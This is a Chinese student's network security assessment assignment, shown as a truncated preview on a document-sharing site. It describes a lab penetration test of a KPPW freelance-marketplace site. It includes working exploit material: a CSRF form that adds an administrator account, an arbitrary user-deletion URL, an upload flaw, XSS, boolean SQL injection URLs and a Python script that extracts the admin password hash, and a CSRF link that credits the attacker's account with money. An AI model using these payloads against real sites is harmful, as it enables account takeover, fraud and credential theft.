网络安全风险评估大作业

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

南阳理工学院网络安全风险评估大作业班级:13级网安四班姓名:彭克杰学号:1315935027指导老师:林玉香2016.5.18网络安全评估目的:网络平台安全泛指操作系统和通用基础服务安全,主要用于防范黑客攻击手段。目前市场上大多数安全产品均具有局限安全性,我们可以通用信息安全评估准则为依据来对其进行评估,来发现问题,修复问题,确定网络平台安全实施。安全弱点和信息资产紧密相连,它可能被威胁利用、引起资产损失或伤害。但是,安全弱点本身不会造成损失,它只是一种条件或环境、可能导致被威胁利用而造成资产损失。安全弱点的出现有各种原因,例如可能是软件开发过程中的质量问题,也可能是系统管理员配置方面的,也可能是管理方面的。但是,它们的共同特性就是给攻击者提供了对主机系统或者其他信息系统攻击的机会。因此,我们对网络产品,网络平台等进行一系列的风险评估很是必要,下面我们就对一个具体的网站进行安全方面的漏洞评估。评估内容:在本次实验中我们借助phpstudy搭建一个威客系统网站,进行实际渗透测试和评估。扫描工具:Burpsuite,Nikto,WebScarab,扫描工具有很多,选个合适的就行。这是发现的一些漏洞:1.删除任意帐号/添加管理员详细说明:=user&view=message&op=send=pubtask&id=1&step=step2收件人填目标用户名,标题没有特定要求,内容没有转义,不过过滤了敏感标签和onerroronload等事件。任意删除账号:=user&view=list&op=del&edituid=5529GET提交此URL就会删除ID为“5529”的用户然后添加管理员,在添加用户处抓包,提交数据Code区域:edituid=&fds[username]=qianlan&fds[truename]=&fds[phone]=&fds[qq]=&fds[indus_pid]=&fds[indus_id]=&fds[birthday]=&fds[password]=111111&fds[email]=x@q.c&fds[group_id]=1&is_submit=1然后构造一个表单:Code区域:formaction==user&view=add&edituid=method=postinputtype=hiddenname=edituidvalue=inputtype=hiddenname=fds[username]value=qianlaninputtype=hiddenname=fds[truename]value=inputtype=hiddenname=fds[phone]value=inputtype=hiddenname=fds[qq]value=inputtype=hiddenname=fds[indus_pid]value=inputtype=hiddenname=fds[indus_id]value=inputtype=hiddenname=fds[birthday]value=inputtype=hiddenname=fds[password]value=123456inputtype=hiddenname=fds[email]value=x@q.cinputtype=hiddenname=fds[group_id]value=1inputtype=submitname=is_submitvalue=1/form其他比较敏感的都隐藏起来。因为script标签被过滤。不能自动提交。所以放出来个按钮,发给人家一看一个按钮是谁都会有好奇心肯定会点下这个按钮。将此发给管理员。就坐等添加新帐号吧,或者可以不用写表单,嵌入其他URL,还可以自动提交。此处自由发挥。此刻来用小号给管理员发个私信现在来看看效果,出来一个小按钮接着点击我们现在来后台的会员管理看看是否添加了一个名为qianlan的管理员添加成功,用户组为管理员帐号qianlan密码123456接下来漏洞证明:2.文件上传导致任意代码执行详细说明:Code区域:keke_user_avatar_class.php文件:staticfunctionuploadavatar($uid){@header(Expires:0);@header(Cache-Control:private,post-check=0,pre-check=0,max-age=0,FALSE);@header(Pragma:no-cache);if(empty($uid)){return-1;}if(empty($_FILES['Filedata'])){return-3;}list($width,$height,$type,$attr)=getimagesize($_FILES['Filedata']['tmp_name']);$imgtype=array(1='.gif',2='.jpg',3='.png');$filetype=$imgtype[$type];if(!$filetype)$filetype='.jpg';$tmpavatar=_DATADIR.'./tmp/upload'.$uid.$filetype;file_exists($tmpavatar)&&@unlink($tmpavatar);if(@copy($_FILES['Filedata']['tmp_name'],$tmpavatar)||@move_uploaded_file($_FILES['Filedata']['tmp_name'],$tmpavatar)){@unlink($_FILES['Filedata']['tmp_name']);list($width,$height,$type,$attr)=getimagesize($tmpavatar);if($width10||$height10||$type==4){@unlink($tmpavatar);return-2;}}else{@unlink($_FILES['Filedata']['tmp_name']);return-4;}$avatarurl=_DATAURL.'/tmp/upload'.$uid.$filetype;return$avatarurl;}在这里$tmpavatar=_DATADIR.'./tmp/upload'.$uid.$filetype;是保存的文件名,在这里uid没有进行过滤,也没有进行长度限制,由于开了GPC无法利用%00截断。这里就用长文件名截断3.XSS跨站脚本攻击详细说明:我们先来注册一个账号,然后发布商品。然后进行抓包,再添加图片处修改:效果:4.SQL注入漏洞详细说明:注册两个帐号,然后其中一个对另外那个发送3个消息。打开中间那条url如下**.**.**.**/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16然后注入下面我们可以看到上一条和下一条。注入测试**.**.**.**/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16and1=1--存在**.**.**.**/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16and1=2--然后消失了。利用url,**.**.**.**/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16and(selectCHAR(48))=SUBSTR((SELECT`password`fromkeke_witkey_memberWHEREuid=1),1,1)--然后整一个小工具替换下hosturlcookiesCode区域:#coding:utf-8importhttplibdefget(i1,i2):page=rHtml=httplib.HTTPConnection(**.**.**.**,80,False)url=/KPPW/index.php?do=user&view=message&op=detail&type=notice&intPage=1&msgId=13%20and%20%28select%20CHAR%28+i1+%29%29=SUBSTR%28%28SELECT%20%60password%60%20from%20keke_witkey_member%20WHERE%20uid%20=1%29,+i2+,1%29--#printurlrHtml.request(GET,url,headers={User-Agent:Firefox/22.0,Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,Accept-Language:en-US,en;q=0.5,Accept-Encoding:gzip,deflate,Cookie:PHPSESSID=x,Connection:keep-alive})page=rHtml.getresponse(False)returnpage.read().count('一条')mm=[]foriinrange(1,33):foriiinrange(48,123):if(get(str(ii),str(i))!=0):mm.append(chr(ii))print.join(mm)break5.csrf漏洞详细说明:我们先来注册一个账号,之后进入一个页面=user地址为:=seller&id=5529可见,我们的用户id为5529再来发布一个商品,=pubgoods然后添加上我们伪造的urlCode区域:=user&view=charge&valid=1&maxCash=100&maxCredit=&user=5529&cash_type=1&cash=100&char填好之后发布,并提交到后台。这种威客网站添加的商品,管理员肯定会在后台审核的。管理员进去后:会有一个get请求就是上面我们填写的一个地址:再来刷新下我们刚才注册的帐号钱增加了100对于此漏洞,我们验证一下后台登录:验证一下id验证合格之后提交并抓包,伪造成GET之后加钱成功6.全局问题导致大面积注入详细问题:文件/control/user/account_auth.phpif($code&&in_array($code,$arrAllowAuth)){$codeor$code=$keys['0'];$codeorkekezu::show_msg($_lang['param_error'],index.php?do=auth,3,'','warning');$auth_class=keke_auth_.$code._class;$objAuth=new$auth_class($code);$auth_item=$arrAllAuthItems[

1 / 21
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功